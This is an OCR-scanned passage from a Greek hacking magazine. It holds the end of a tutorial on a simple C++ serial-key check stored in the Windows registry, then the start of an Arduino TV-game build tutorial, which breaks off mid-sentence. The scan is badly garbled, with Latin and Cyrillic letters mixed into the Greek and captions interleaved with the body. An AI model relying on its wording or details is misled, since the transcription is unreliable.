μεγάλος εἶναι, τόσο το καλύτερο. Ὅποιος τον βρει, ας τον κάνει post στο 
http://deltahacker.gr, αναφέροντας φυσικὰ και τον τρόπο ;) 


Το πρόγραμμα 


Το δικὀ µας πρὀγραμμα θα υλοποιεί τον παραπάνω αλγὀριθµο και µε au- 
τὸν θα μπορεί να ελέγχει τα κλειδιά που του δίνουμε. Όπως εἰπαμε, το 
πρὀγραμμἁ µας δεν θα απαιτεἰ σύνδεση στο Internet και θα μπορεὶ va 
εγκατασταθεί σε οποιοδήποτε Windows box. 


Ὅταν ξεκινά το πρὀγραμμα, θα ζητά апо το χρήστη να πληκτρολογήσει 
ἑνα κλειδὶ και θα συνεχίζει μόνον αν το κλειδὶ που ἐδωσε ο χρήστης εἶναι 
γνήσιο (ἐγκυρο). Μ΄ ἀλλα λόγια, θα συνεχίζει μόνον αν το κλειδὶ ικανο- 
ποιεἰ τους παραπάνω κανόνες που θἐσαµε. Βέβαια, µε το που δώσουμε 
ἑνα γνήσιο κλειδὶ o! ἐλεγχοι σταματούν, ὁπως εξάλλου συμβαίνει και µε 
та εµπορικἀ προγράµµατα. Το κλειδὶ εισάγεται μόνο µια φορά! Εφόσον ci- 
ναι γνήσιο, το πρὀγραμμα δεν ξαναζητὰ κλειδὶ. Θα αναρωτηθείτε βέβαια 
--και θα έχετε δίκιο βουνὸ у” αναρωτηθεῖτε — пос θυμάται бт! έχουμε 
δώσει ἐγκυρο κλειδἰ! Όταν δίνουμε Eva γνήσιο κλειδί, το πρόγραμμα 
φροντίζει να το καταχωρήσει κάπου — κι αρκετά συχνά σε κρυπτογραφη- 
μένη µορφή. Αυτὀ το «κάπου», ὁπου φυλάσσεται το κλειδί, εἶναι συχνά 
το registry, κἄποια DLL του προγράμματος ἡ και τα δύο! Κάτι παρόμοιο 
λοιπὸν θα κάνει και το δικὀ µας πρὀγραμμα. Εφόσον δώσουμε γνήσιο 


Enter Serial Number | 


ж) 


1. Μην neite την λέξη Πεδίο Ορισμού, θα µου θυμίσετε το σχολείο και ҳалёра!! ;-) 


Το δικὀ µας 
πρὀγραμμα εἰναι 
λακωνικὀ: Δώσε TO 
κλειδί... 


VHA@KER 


ÁN 


κλειδί το npòypappa θα το αποθηκεύσει αμέσως στο registry και δεν θα 
μας το ζητήσει ποτὲ ξανὰ. 


Па va µη µας µαλώνετε, σας λέμε апо тора оті για λόγους απλότητας 
του παραδεϊἰγματὀὸς µας και για να µην ξεφεύγουµε апо το προκεἰµενο, TO 
κλειδὶ θα καταχωρεἰται ως plain text. Κοινώς, δε θα χρησιμοποιήσουμε 
καμία μέθοδο κρυπτογράφησης για την αποθἠκευσή του. 


СД Serial Number Verification (c) by Thiseas 2011 for DeltaHacker [=| J| Ж | 


Enter Serial Number abef-efgh-babk-ehyk 


Αν δώσουμε σωστό 
κλειδί, το прд- 
үрацџа θα µας 
ενημερώσει για 
την επιτυχία Kal 

θα προχωρήσει 
παρακάτω. Βέβαια 
την ἰδια στιγμὴ θα 
καταχωρήσει TO 
κλειδί στο registry, 
ώστε τις επὀµενες 
φορές που θα το 
трёёоиџ να µη µας 
ζητήσει τίποτα... 
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(i) Thank you for registering for this software! 


Ας δούμε тора αναλυτικότερα τη λογική που θα ακολουθεἰ To πρὀγραμ- 


μα. 


ο ом AH Ó wN F 


14. 


Αρχή 

Διάβασε το κλειδί апд το Registry 

Αν υπάρχει και εἶναι σωστό, πήγαινε στο βήμα 9 

Αν δεν υπάρχει ἡ αν δεν εἶναι σωστό, προχώρησε στο βήμα 3 
Ζήτησε απὀ το χρήστη να δώσει το κλειδί 

Αν ο χρήστης πατήσει [X] πήγαινε στο βήμα 10 αλλιώς συνέχισε 
Έλεγξε τη γνησιότητα του κλειδιού 

Αν το κλειδί εἶναι σωστὸ, πήγαινε στο βήμα 8 

Εάν το κλειδί εἶναι λανθασμένο, συνέχισε 

Δείξε στο χρήστη éva μήνυμα λάθους (π.χ. «This ain't Jim Beam») 
Πήγαινε στο βήμα 3 

Καταχώρησε το σωστὸ κλειδί στο registry 

Επίτρεψε την είσοδο στο πρόγραµµα 


Τέλος 


Η υλοποίηση θα γίνει C++ kal θα χρησιμοποιήσουμε τον compiler 
Embarcadero C++ 2010. Πρὀκειται για τον compiler της αθάνατης και 
пала! ποτὲ κραταιἠς Borland, µε την οποία πολλοὶ апо εμάς ἑκαναν 
τα прота τους (δειλὰ) προγραμματιστικἁἀ βήματα, κάπου 25 χρόνια πριν 


Πώς δημιουργούνται τα κλειδιά προστασίας; 
“0 


(http://en.wikipedia.org/wiki/Turbo_Pascal2). Επίσης, πρέπει να πούμε 
ότι το εκτελέἐσιµο που γεννάει αυτὸς ο compiler εἶναι απαλλαγμένο and 

«θόρυβο του .Net Framework. Αυτό δεν εἶναι κατ’ ανάγκη кало, αλλά 
μπορεἰ και να εἶναι: εξαρτάται ano ποια πλευρά το εξετάζει κανεἰς ;) Па- 
ντως το σίγουρο εἶναι Eva: Με αυτό το εκτελέσιμο, ο Olly debugger (www. 
ollydbg.de) θα νοιώθει σαν στο σπίτι του. 


Τον πηγαἰο κὠδικα του προγράμματος κατεβάστε апо το 
http://bit.ly/dh@e2snver 


Επεξήγηση 


H πρώτη βασικἠ εργασία εἶναι να ελἐγξουµε αν το κλειδί υπάρχει στο un- 
троо. AUTO συμβαίνει µε τη συνάρτηση bExistInReg(). Φυσικά, την про- 
τη φορὰ που τρέχουμε το πρόγραμμα δεν υπάρχει τίποτα στο registry. 
Μόλις ὁμως δώσουμε Eva γνήσιο κλειδί, θα καταγραφεί στο µητρώο µε 
χρήση της συνάρτησης bWriteToReg(). 


|| File Edit View Favorites Help 


4 8 Computer Name Data 
po) HKEY_CLASSES ROOT 29) (Default) T (value not set) 
a- J} HKEV_CURRENT_USER 
| oi J) %KnownPackagesRegName64% 
> AppEvents 
i Ὦ Console 
b 8 Control Panel 
L.R Environment 
pj) EUDC 
>» J) Identities 
> ИТ Keyboard Layout 
00 Network 
p- ΠῚ Printers 
> Software 


b. |Ë System 


i р. > Volatile Environment 

b. ν HKEY_LOCAL_MACHINE 

b )) HKEY_USERS 

> И HKEY_CURRENT_CONFIG 


Computer\HKEY_CURRENT_USER\ThiseasKeyProtection 


Ὅπως βλέπετε, η συνάρτηση bWriteToReg() δημιουργεί στο μητρώο то Το κλειδί µας 
κλειδὶ ThiseasKeyProtection, στο οποίο θα καταχωρηθεί το κλειδί. До- καταχωρήθηκε στο 
στε βάση στο γεγονός ӧті όλα αυτά καταχωρούνται като апо το HKEY_ μητρώο! 


CURRENT_USER. Auto δεν εἶναι τυχαίο. H επιλογἠ Tou ἐγινε για δύο βα- 
OIKOUG λόγους: 


ο То πρὀγραμμα θα πρέπει να εκτελείται xopic να ζητάει κλειδὶ (EMO- 
σον αυτὸ δόθηκε μία фора), μόνο για τον τρέχοντα χρήστη του 
λειτουργικού συστήματος. Κάθε άλλος χρήστης θα πρέπει να ξα- 
ναδώσει κλειδὶ. 


2. Μήνυμα προς τους παλιούς: Μην µας πείτε ὁτι δεν χρησιµοποιήσατε ποτὲ Turbo Pascal γιατὶ δεν θα σας 
πιστέψουμε! 
3. Δεν μπορούμε να σας πούμε περισσότερα -- τουλάχιστον ὀχι ακόµα! 


Αν δώσουμε σωστό 
κλειδί και προχω- 
ρήσει η εκτέλεση 
του προγράμματος, 
θα δούμε ακριβώς 
αυτό! Εντάξει, 

το συγκεκριµένο 
«αυτό» δεν ἀξιζε 
τη φασαρία nou 
κάναμε, алла ка- 
ποιο ἆλλο «αυτό» 
θα την αξίζει ;) 
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ο To πρόγραμμα δεν ἐχει δικαίωμα να γράφει οπουδήποτε στο 
registry! Па va συμβεἰ αυτό, θα πρέπει να τρέχει µε δικαιώματα 
Super User (Admin), πράγμα που για λόγους ασφάλειας δεν Өғ- 
λουµε καθόλου ра καθόλου. Με τα δικαιώματα που ἐχει ἑνας απλὀς 
χρήστης, μπορούμε να γράφουμε στο section HKEY_CURRENT_ 
USER. 


Н συνάρτηση που κάνει τον ἐλεγχο γνησιότητας εἶναι η iCheckKey(). 
Όπως βλέπετε, η υλοποίηση της εἶναι πολύ πιο απλἠ απ’ ό,τι η περιγραφή 
της! Στην ουσία, ελέγχει αν ισχύουν οι κανόνες γνησιότητας που nepi- 
γράψαμε αρχικἁ. Αν ισχύουν επιστρέφει true, αλλιώς false. Μόλις δώσετε 
σωστὸ κλειδί, το πρὀγραμμα θα εμφανίσει Eva μήνυμα бт! προχωράτε 
στην εκτέλεση του κυρίως προγράμματος και δεν θα σας το ξαναζητή- 
σει. O ἐλεγχος aUTOG γίνεται στη συνάρτηση FormCreate(). Στην npay- 


ματικότητα, πρὀκειται για το event 
Start program... ¿&.. ' ee) 


(γεγονός) που ενεργοποιείται λίγο 
πριν εμφανιστεὶ η φόρμα του ελἐγ- 
xou κλειδιού. Αν πετύχει ο ἔλεγχος 
στο μητρώο, τότε θα εμφανιστεὶ 
Ἐμόνοξ το μήνυμα бт! περνάμε στο 
κυρίως πρὀγραμμα. 


Αν θἐλουµενα επαναληφθεί η διαδι- 
κασία πιστοποίησης µε κάποιο κλει- 
бї, δεν έχουμε Napa να διαγράψου- 
με την τιµή ThiseasKeyProtection 
ano το registry. 


Ci) Programs Main Form 
OK | 


Και тора τι; 


Σας δεἰξαµε ἑναν τρόπο µε τον οποίο µπορείτε να προστατεύετε τα про- 
γράμματά σας ano µη εξουσιοδοτηµένους χρήστες. Βέβαια, ο αλγόριθμος 
ελέγχου γνησιότητας алла και η μέθοδος αποθήκευσης του κλειδιού εἶναι 
πολὺ απλές. Προφανώς η επιλογἠ τους ἐγινε για εκπαιδευτικούς λόγους, 
@OTE να pavzi εὐκολα και γρήγορα ο τρόπος που λειτουργεί Eva τέτοιο 
σύστημα προστασίας. Εσεὶς φυσικά µπορείτε να ακολουθήσετε πιο σύν- 
θετες προσεγγίσεις. Πα παράδειγµα, μπορείτε να κατασκευάσετε προ- 
γράμματα που υλοποιούν τη λεγόμενη περἰοδο αξιολόγησης (evaluation 
period). Κάτι τέτοιο γίνεται αρκετά εὐκολα, αν най! µε το κλειδὶ αποθη- 
κεύετε στο registry και την ημερομηνία της πρὠτης εκτέλεσης του про- 
γράμματος. Στη συνέχεια, κάθε фора που ξεκινάει το проүрарра аркі 
να αφαιρείτε апо την τρέχουσα ημερομηνία του συστήματος την κατα- 
χωρημένη ημερομηνία, για να βρίσκετε πόσες ημέρες ¿xouv περάσει апо 
την πρώτη ενεργοποίηση. Έτσι µπορείτε να περιορἰσετε την εκτέλεση του 
προγράμματος σε ὁσες ημέρες θέλετε. Αν για παράδειγµα ἐχουν περάσει 
πάνω ano 30 ημέρες, µπορείτε να ζητάτε ano το χρήστη να δώσει ἆλλο 
κλειδὶ. Μπορείτε επἰσης να καταχωρεῖτε τις τιµές στο registry σε Kpu- 
πτογραφημένη µορφή, ώστε να µη μπορούν να τροποποιηθούν εὐκολα. 
Επιπρόσθετα, θα μπορούσατε να χρησιμοποιήσετε ως θέση αποθήκευσης 
του κλειδιού (κρυπτογραφημένα πάντα) ша DLL που θα δίνετε μαζί µε 
το εκτελέἐσιµο. Οι συνδυασμοί περιορἰζονται μόνο and τις γνώσεις και τη 
φαντασία του καθενός! Εμείς σας δεἰξαµε το δρόµο, αλλά θα πρέπει όμως 
να τον διαβεἰτε μόνοι σας... 


Εσείς τι δικαιολογία έχετε που η διαφήμισή σας απουσιάζει από εδώ; 


Τολμήστε να µας τη στείλετε στο talk2us@deltahacker.gr. Όπως και να "χει θα 
επικοινωνίσουµε κι εμείς μαζί σας (3) - ή έστω µε τον ανταγωνιστή σας ;) 
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Προφανώς κι ἐφτασε, αλλά πριν ξεκινήσουμε θα πρέπει να πάρουμε τα 
πράγματα ano την αρχἠ. Τι εἶναι αυτὀ το Arduino και τι κάνει; То Arduino 
δεν εἶναι τίποτα ἄλλο пара ἑνας μικροελεγκτἠς AVR ano την Atmel, "τυ- 
λιγμένος” µε το κατάλληλο software ὥστε να ‘val προσιτὸς στους χρή- 
στες που δεν εἰχαν ποτὲ σχέση µε τα ηλεκτρονικἀ. Ἐρχεται µε TO δικὀ 
του περιβάλλον ανάπτυξης (Integrated Development Environment, IDE) 
αλλά και HE TIG δικὲς του βιβλιοθήκες, οι onoigç επιτρέπουν σ΄ οποιονδἠ- 
ποτε EXE] βασικὲς προγραμματιστικὲς γνώσεις να φτιάξει, χμ, οτιδήποτε 
μπορεί να φανταστεὶ! 


Ὅπως εἰπαμε, στην καρδιά Tou Arduino βρίσκεται ἑνας AVR. Το συγκε- 
κριμένο τσιπάκι δεν αποτελεἰ апла vav επεξεργαστή. Αντίθετα, θα uno- 
ρούσαμε να πούμε OT! αποτελεἰ ¿vav ολοκληρωμένο υπολογιστή, αφού 
μέσα του περιέχει επεξεργαστή, μνήμη RAM, µια μνήμη Flash για την 
αποθήκευση του προγράμματος αλλά και µια μνήμη EEPROM, για τη pò- 
viun αποθήκευση δεδομένων. Φυσικά, μαζὶ р’ айта τα εξαρτήματα οι AVR 
διαθέτουν και διαύλους σειραϊκής επικοινωνίας (UART, SPI, κ.λπ.), ὁπως 
επἰσης μετατροπέα αναλογικού σήματος σε ψηφιακὸὀ, συγκριτἠ τάσεων 
και διάφορα ἄλλα. Στον AVR Tou Arduino, λοιπὀν, κρύβεται ἑνας επεξερ- 
γαστἠς 8bit που τρέχει στα 16MHz και διαθέτει 2Kb RAM, 32Kb Flash και 
512 byte EEPROM. Αυτά τα μεγέθη μοιάζουν εξαιρετικἁ μικρά. Πράγματι 
εἶναι, αν τα συγκρίνουμε µε τα αντἰστοιχα των υπολογιστών που έχουμε 
στο σπἰτι! Ταυτόχρονα, ωστόσο, та ἰδια μεγέθη κρίνονται τουλάχιστον 
επαρκή yia TIG εφαρμογὲς TIG οποίες προορίζεται να τρέχει TO Arduino. Mı- 
λάμε πάντα για τις “μικρές” εκδόσεις του Arduino: Το пало Diecimila, το 
Duemilanove και το νεότερο Uno. Τα Arduino της σειρἁς Mega βασίζονται 
с’ алло μοντέλο AVR και διαθέτουν μεγαλύτερες μνήμες КАМ και Flash! 


Ας γυρίσουμε тора στο software. Παραδοσιακά, για να χειριστούμε Eva 
pin (ἑναν ακροδέκτη) ενὸς HIKPOEAEYKTN, ἐπρεπε να μπλέξουμε µε TO 
τάδε bit του deiva byte. H ομάδα του Arduino όμως δημιούργησε τις KA- 
τἆλληλες συναρτήσεις στη γλῶσσα С, WOTE ο χειρισμός των pin και γενι- 
κότερα του κάθε περιφερειακού να γἱνεται апла κι εὐκολα. Με àiya λόγια, 
ἑκαναν την προγραµμματιστικἠ µας ζωὴ καλύτερη. Επιπλέον, η μεγάλη 
κοινότητα που ἐχει αναπτυχθεί γύρω апо το Arduino ἐχει συμβάλει στην 
ανάπτυξη πολλών βιβλιοθηκών, για οποιοδήποτε περιφερειακὀ μπορεί va 
συνδεθεί στο Arduino. Βλέπετε, η πλακέτα του Arduino εἰναι ETO! OXE- 
διασµένη WOTE να συνδέονται (να κουμπώνουν) πάνω της ἄλλες πλα- 
κέτες, γνωστὲς ως shields. Ta shields προσθέτουν επιπλέον λειτουργίες 
στο Arduino, χωρίς поло κόπο και χωρίς να προὐποθέτουν προχωρημένες 
γνώσεις ηλεκτρονικὠν. Το πιο γνωστὸ shield εἶναι το Ethernet shield, 
το onoio παρέχει στο Arduino δυνατότητες networking. Μπορεί Aoinov 
κανεὶς να φτιάξει τον δικό του web server χρησιμοποιώντας ¿va Arduino 
και το OXETIKO shield, προκειμένου να παρακολουθεί τη θερμοκρασία του 
σπιτιού TOU апо παντού, να χειρίζεται το πλυντήριο µέσω Ethernet, να 
κάνει την καφετιέρα του διαδικτυακἠ και πολλά ακόμη. Εδὠ va σημειώ- 
OOUHE ότι αυτά ¿xouv ξαναγίνει ano παλιότερους hackers και μάλιστα ap- 
KETEG φορὲς. Επομένως, θα χρειαστεί να σκεφτούμε αρκετά, αν θέλουμε 
να βρούμε και να φτιάξουμε κάτι πρωτότυπο κι εντυπωσιακὀ ;) 


Κάτι θα φτιάχναμε, σωστά; 


Σωστά! Το Arduino αποτελεί πραγματικἁ µια αρκετἁ δυνατή πλατφόρμα 
στην οποία µπορεί κανεὶς να κάνει θαύματα. Δεν χρειάζονται πάντα na- 
νάκριβα εξαρτήματα για να φτιάξει κάποιος κάτι εντυπωσιακὀ. Για παρά- 
δειγµα, αν θελήσει κανεὶς να φτιάξει ¿vav απλὀ web server, θα χρειαστεί 


TV-Game ug to Arduino (part 1 of 2) 
⁄Z////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////7/ 


eva Ethernet shield και προαιρετικἁ ἑνα SD shield', ώστε να αποθηκεύει 
τις σελίδες που θα δημοσιεύονται ano Tov server. Εμεὶς, µε την βοήθεια 
του Arduino και µε µερικὲς βιβλιοθήκες που διατίθενται δωρεάν, θα φτιά- 
ἔουμε σήμερα το δικὀ µας TV-game: Φανταστείτε µια απλἠ κονσόλα η 
οποία συνδέεται στην τηλεόραση (ἡ στην κάρτα τηλεόρασης του υπολο- 
γιστἠ) και παἰζει κἄποιο συγκεκριμένο παιχνίδι, το опоіо έχουμε φτιάξει 
μόνοι μας! Πριν αρχίσει η φαντασία να οργιάζει µε 3D γραφικὰἁ και ἠχο 
5.1 surround, θυμηθείτε ὁτι μιλάμε για vav μικροελεγκτἠ µε δυνατὸ- 
τητες υπολογιστή της δεκαετίας του 1980. Το παιχνίδι µας θα μοιάζει 
περισσότερο στο κλασικὀ Pong και ото πρῶτο Space Invaders, παρὰ στα 
παιχνίδια που ἐχουμε συνηθίσει να παϊζουµε σήμερα στους υπολογιστὲς 
μας. Πα την ακρίβεια, θα εἶναι ασπρὀµαυρο και χωρίς ñxo - ἡ μήπως OXI; 
Αυτό 8a το δούμε ;) 


Πριν συνεχίσουμε να πούμε ὁτι στο άρθρο αυτὀ θα βάλουμε τις anapai- 
τητες βάσεις για το παιχνἰδι µας, ενώ στη συνέἐχειἁ του, που θα δηµο- 
σιεύσουµε στο deltaHacker Δεκεμβρίου, θα το ολοκληρώσουμε. Πάντως 
μην πιστέψετε OUTE για ша στιγµἠ OT! θα βαρεθεῖτε, αφού και για τα δύο 
άρθρα έχουμε πολλή κι ενδιαφέρουσα δουλειά να κάνουμε. Ας ξεκινή- 
coupe, λοιπὀν! 


Θα χρειαστούμε τίποτα; 


Μετὰ апо τόσες παραγράφους που agiepw- 
сан στο Arduino, εἶναι προφανὲς οτι θα 
χρειαστούμε eva! Па то бїк© µας πρὀτζεκτ 
θα χρειαστεἰ Eva Diecimila, Duemilanove ἡ 
Uno. Μπορεὶ каміс να το προμηθευτεἰ апо 
TO http://arduino.cc, επιλέγοντας κάποιον 
µεταπωλητή για Ελλάδα. Βέβαια μπορούμε 
να το παραγγεἰλουμε κι and To eBay, ouv- 
θως σε αρκετά χαμηλότερη τιμὴ апо αυτή 
των επίσημων µεταπωλητών. Εδὠ να σηµει- 
ώσουμε OT! χάρη στον ανοιχτὀ χαρακτήρα 
(a λα Open Source) του Arduino, υπάρχουν 
αρκετές υλοποιήσεις/παραλλαγὲς του. Κλα- 
σικὀ παράδειγμα αποτελεί το Freeduino: 
Ἕνας κλώνος -ὀπως αποκαλεἰται- του Ar- 
duino, ο οποίος εἶναι 100% συμβατὸς µε то 
πρωτότυπο. Μπορεἰ λοιπὸν να βρει κάποιος 
ἑναν κλώνο Tou Arduino, άγνωστης μάρκας 
και προέλευσης, σε поло χαμηλότερη τιµή. 
Εναλλακτικἁ, μπορεὶ κανεὶς να κατεβάσει τα 
σχέδια της πλακέτας και να φτιάξει τη δικἠ 
του! Στον κόσμο Tou Arduino και Tou Open 
Source, όλα εἶναι δυνατά! :D 
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Εφόσον αποκτήσουμε To Arduino για To πρὀ- 
τζεκτ µας θα χρειαστούμε κι Eva παλιό καλώ- 
dio RCA. Αναφερόμαστε στο καλώδιο µε TO 
στρογγυλό βύσμα, που χρησιμοποιείται στις 
кєраїєс алла και σε ηχοσυστήματα ὥστε va 
μεταφέρει μεμονωμένα κανάλια ήχου. Eni- 
πρὀσθετα, θα χρειαστούμε EPIKA κουμπάκια 


1. Πρὀκειται για ёа shield που διαθέτει υποδοχἠ για κάρτες SD, καθώς και οτιδήποτε GAAO απαιτείται ώστε va 
μιλάει To Arduino µε την εκάστοτε карта... 


Τα δύο акра ενός 
τυπικού καλωδίου 
ΚΟΑ... 
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Οι διακόπτες push button εἶναι κάπως ἐτσι. О δικός 
σας µπορεί va ἐχει μεγαλύτερο "καπάκι” ἡ και να 
εἶναι GAAo χρώμα. H λειτουργία του πάντως θα εἶναι 
ίδια. Τα ποδαράκια που έχουμε σημειώσει µε KÓK- 
κινο χρώμα αποτελούν ζευγάρι και εἶναι «μονίμως. 
συνδεμένα στο εσωτερικὀ του διακόπτη. То ідо 
συμβαίνει και µε τα ἀλλα δύο. Όταν πατάμε το KOU- 
uni, τα δύο ζευγάρια συνδέονται και μεταξύ τους! 


Ένα κλασικό breadboard (ἡ ρἀστερ). Οι υποδοχὲς που βρίσκονται στις δύο 
πορτοκαλί περιοχὲς εἰναι συνδεδεμένες εσωτερικά σε γραμμές, avd 25. О uno- 
OOXEG αυτών των περιοχών χρησιμοποιούνται για την τροφοδοσία του εκάστοτε 
κυκλώματος που φτιάχνουμε. li’ αυτό το λόγο, επάνω στο ρἀστερ υπάρχουν 
κόκκινες (5V) και μπλε (OV ἡ GND) γραμμές, που µας δεἰχνουν/θυμίζουν πώς 
συνδέεται η τροφοδοσία. H σὐνδεσή τους σημειώνεται HE TIG πράσινες γραμμές. 
Όλες οι υπόλοιπες υποδοχὲς του breadboard εἶναι χωρισμένες σε δύο περιοχές, 
ano éva... αυλάκι. Σε κάθε περιοχή, οι υποδοχές εἶναι συνδεδεμένες εσωτερικά 
σε πεντάδες, ὁπως δείχνουν οι μπλε γραμμές. 


push button (γνωστὰ κι ως tactile switches), καθώς και δύο αντιστάσεις, 
µε τιμές που θα αναφέρουμε παρακάτω. Πα την εὐρεση του καλωδίου 
υπάρχουν δύο λύσεις. Н µία (η προφανής) εἶναι να το αγοράσουμε. H 
δεύτερη (η πιο βολικἠ και οικονομική) εἶναι να ψάξουμε στο σπίτι, µε την 
ελπίδα να βρούμε κάποιο παραπεταμένο. Κάτι τέτοιο δεν εἶναι απίθανο, 
αφού τα καλώδια RCA συνοδεύουν πολλὲς τηλεοράσεις алла και πολλὰ 
συστήματα ἠχου, κάρτες ἠχου και κάρτες γραφικών! Αυτό το καλώδιο θα 
μας χρειαστεί για να συνδέσουµε την πλακέτα του Arduino µε την εἰσοδο 
composite της τηλεόρασης. Επομένως, ἐχετε υπόψη бт! апо τη pia μεριὰ 
του θα κοπεί, ὥστε να αποκαλυφθούν та καλώδια. Τέλος, για та κουμπά- 
κια και τις αντιστάσεις, αυτά μπορούμε να τα πάρουμε апо οποιοδήποτε 
κατάστημα πουλάει ηλεκτρονικά εξαρτήματα. Συνοψἰζοντας, λοιπὀν, για 
την ολοκλήρωση του πρὀτζεκτ µας θα χρειαστούμε τα παρακάτω: 


e ‘Eva Arduino Diecimila, Duemilanove? ἡ Uno, 
ο μία αντίσταση %4 watt στα 4702 (Ohm), 
ο μία αντίσταση М watt στα 1KQ, 


2. Θα χρειαστεί να προσέξουμε ποιὸν AVR ἐχει πάνω η πλακέτα! Όλα та Arduino Diecimila και τα npw- 

τα Arduino Duemilanove έχουν Tov АТтеда168 ο οποίος έχει 1KB RAM. Ano τις αρχὲς του 2009 όμως, та 
Duemilanove πωλούνται µε ATmega368 που ἐχει 2ΚΒ RAM και μπορεί να τρέχει την βιβλιοθήκη του TV-out. Το 
δικό µας Arduino λοιπὀν, θα πρέπει να βασίζεται στον ATmega368! 


TV-Game ug to Arduino (part 1 of 
Αα 


ο òga κουμπιά (push button) θέλουμε να ἐχει το παιχνίδι µας, 
ο αντίστοιχου πλήθους αντιστάσεις του 1KQ, 


ο èva breadboard (γνωστό και σαν ράστερ) για να σχηµατίσουµε το 
κύκλωμα, 


ο μερικά κομμάτια (μονόκλωνο) καλώδιο για τις συνδέσεις στο 
breadboard και 


ο èva (ката προτίμηση παλιὀ) καλώδιο RCA 


τις αντιστάσεις, Ta push button, To breadboard 
και τα καλώδια για τις συνδέσεις, μπορούμε ὁλα 
να τα βρούμε ano τα καταστήματα που πουλάνε 
ηλεκτρονικά εξαρτήματα. Μάλιστα, µε εξαίρεση 
το breadboard nou θα διατίθεται για τουλάχιστον 
6 cupo (η τιμή εξαρτάται апо το μἐγεθός του), τα 
υπόλοιπα θα κοστίζουν λιγότερο ano 2 ευρώ! Τέλος, 
πέρα апо τα υλικά θα χρειαστούμε και το κατάλλη- 
Ло software. Συγκεκριµένα θα χρειαστούμε To Arduino 
IDE, το onoio μπορούμε να κατεβάσουµε δωρεὰν апо To 
http://arduino.cc, αλλά και τη βιβλιοθήκη arduino-tvout, 
την οποία μπορούμε να κατεβάσουµε апо το http://code. 
google.com/p/arduino-tvout. Η εγκατάσταση των βιβλιοθηκών ао 
γίνεται πανεύκολα, µε µια αντιγραφἠ των αρχείων στον φάκελο libraries? ζουν οἱ γραμμές 
του Arduino IDE. τροφοδοσίας! 
Та συγκεκριµέ- 
να ρἀστερ εἰναι 
μάλλον δύσχρηστα 
για τους αρχάριους 
Kal καλό θα ἦταν 
να τα αποφύγετε, 


Στην αγορά διατί- 
θενται και шкра 


Λύση πακέτο. Κυριολεκτικά. 


Ti γίνεται αν κάποιος αρχάριος µε та ηλεκτρονικἁ και το Arduino ano- 
φασίσει *twpa* να ξεκινήσει; H καλύτερη επιλογή θα ἦταν η αγορά 


ενός Arduino starter-kit. Πρόκειται για πακέτα που διαθέτουν Eva Ar- παρά το χαριτωμέ- 
duino και πολλά алла εξαρτήματα, ὁπως αντιστάσεις διαφόρων HE- νο τους χρώμα και 
γεθών, LED, διακόπτες push-button και πάει λέγοντας. Τα διαθέσιµα μέγεθος ;) 


starter-kit είναι ἀπειρα, αλλά ευτυχώς και αριθµήσιµα :D Στο ebay 
υπάρχει μεγάλη ποικιλία τέτοιων πακέτων που διαφοροποιούνται ως 
προς το πλήθος και το εἶδος των εξαρτημάτων, όπως επίσης και ως 
προς το Arduino που περιλαμβάνουν. Kata πάσα πιθανότητα τα εξαρ- 
τήµατα που χρειαζόμαστε για το δικὀ µας πρὀτζεκτ υπάρχουν σε κάθε 
starter-kit. 


Ας προχωρήσουμε! 


Το κύκλωμα που θα υλοποιήσουμε, χωρίζεται σε δύο µέρη: Το αριστερὀ 
τµήµα ευθύνεται για την εἰσοδο (Φαίνεται ἄλλωστε κι απ’ τα κουμπιά) 
και το δεξὶ για την ἐξοδο. Προφανώς, στο δεύτερο θα συνδεθεὶ και η 
τηλεὀρασή µας ñ, ὁπως εἰπαμε νωρίτερα, η карта ΤΝ του υπολογιστή 
μας. То εἶδος της συσκευής δεν έχει kapia σημασία, αρκεἰ να EXE! εἰσοδο 
composite video. Па αρχή θα ξεκινήσουμε µε TO τµήµα που ευθύνεται για 
την εικὀνα. Θα χρειαστεἰὶ να συνδέσουµε την αντίσταση των 470Ω ото 
pin 7 Tou Arduino, καθώς και µια απὀ τις αντιστάσεις 1ΚΩ στο pin 9. Ta 


3. Σύμφωνα µε τις οδηγίες του Arduino IDE, ο συγκεκριμένος φάκελος προορίζεται үа тс βιβλιοθήκες που 
συνοδεύουν το Arduino και µόνο. O χρήστης, σύμφωνα µε τις επίσημες οδηγίες πάντα, πρέπει να εγκαθιστά τις 
βιβλιοθήκες του στον φάκελο libraries, μέσα στον κατάλογο που φιλοξενεί το εκάστοτε project του. Ωστόσο, η 
θέση των βιβλιοθηκών δεν δημιουργεί κανένα απολύτως πρόβλημα και εἶναι πολλοί εκείνοι που τοποθετούν τις 
“ξένες” βιβλιοθήκες рай µε τις “επίσημες”. Αυτή η διευθέτηση βολεύει όταν θέλουμε να TPEXOULE το Arduino 
IDE µε ὀλες τις βιβλιοθήκες, μέσα апо капою USB disk, NAS κ.λπ. 


Το κύκλωμα της 
κονσόλας µας 

είναι εξαιρετικἀ 
σπλό! ΟΙ πράσινες 
γραμμές δείχνουν 
τη διασύνδεση των 
διακοπτών, ενώ οι 
μπλε δείχνουν τις 
συνδέσεις για την 
ἐξοδο του σήματος 
βίντεο. Το καλώδιο 
RCA πρέπει va 
συνδεθεί στις UWB 
γραμμές, µε TOV 
τρόπο που εξηγού- 
µε στο άρθρο. 
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ελεύθερα ἄκρα των αντιστάσεων δεν θα παραμείνουν για πολύ ελεύθερα, 
αφού θα συνδεθούν μεταξὺ τους και, ταυτόχρονα, το άκρο της αντίστα- 
σης του 1KQ θα συνδεθεἰ στο καλώδιο RCA. О αντιστάσεις δεν έχουν, 
πολικότητα οπὀτε µην σας ανησυχεί το пос θα τοποθετηθούν. Το καλώδιο 
RCA ὁμως πρέπει να συνδεθεί µε συγκεκριµένο τρόπο. Ὅπως βλέπουμε, 
διαθέτει δύο επαφἑς: Το γύρω-γύρω του βύσματος που ονομάζεται GND 
(Ground, γείωση ñ τάση αναφοράς) алла και το καρφάκι pe TO ὀνομα VID. 
Το прото θα πρέπει να συνδεθεἰ στο GND της πλακέτας Tou Arduino, εν 
το δεύτερο που μεταφέρει το σήμα βίντεο πρέπει να συνδεθεἰ στο ελεύ- 
θερο акро της αντίστασης του 1ΚΩ. 


Περισσότερες συνδέσεις 


Στην συνέχεια θα χρειαστεί να συνδέσουµε τα κουμπιά. Το κύκλωμα εἶναι 
λίγο, χμ, περἰεργο. Δεν υπάρχει ὁμως λόγος ανησυχίας. Σε λίγο θα κατα- 
λάβετε τα πάντα. Θέλουμε το Arduino να αντιλαμβάνεται πότε πιἐζουµε 
